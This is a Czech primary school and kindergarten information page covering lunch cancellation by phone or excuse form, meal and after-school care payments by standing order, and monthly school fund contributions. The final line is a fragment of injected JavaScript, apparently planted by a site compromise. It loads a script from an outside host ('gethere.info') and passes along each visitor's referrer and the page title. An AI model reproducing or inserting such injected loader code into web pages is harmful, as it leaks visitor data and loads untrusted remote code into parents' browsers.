Důležité info

Telefonní číslo pro odhlašování obědů:     735 756 731 

 

 

 

Přehled alergenů

 

Platby stravného a úplaty za ŠD a MŠ od šk. roku 2016 – 2017 se hradí pouze:

  • přes účet (každý rodič obdrží lísteček s podklady k zadání trvalého příkazu, splatnost vždy k 20. dni v měsíci), č. účtu:115-7987320257/0100       

Platba do školního fondu, který je čerpán na akce školy (výlety, divadla…) rozpis je k dispozici na nástěnkách v ZŠ, je možné uhradit:

  • děti MŠ – hotově u p. učitelky v MŠ – měsíčně 50,-, nebo lze uhradit jednorázově na celý školní rok
  • děti ZŠ – hotově u pověřeného žáka ZŠ – měsíčně 50,-

___________________________________________________

Odhlašování obědů

Při nemoci dítěte, či jiné nutné absenci ve škole či školce, je nutné odhlásit stravování svého dítěte 24h předem nejdéle však do 7.00 h toho dne. Odhlášení můžete provést elektronicky přes „omluvenku žáka“, mailem či telefonicky – kontakty zde. Pokud to nestihnete, je možné si první den oběd odebrat do jídlonosičů do 12h. Na pozdější odhlášení není možné brát zřetel. Děkujeme za pochopení.

___________________________________________________

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;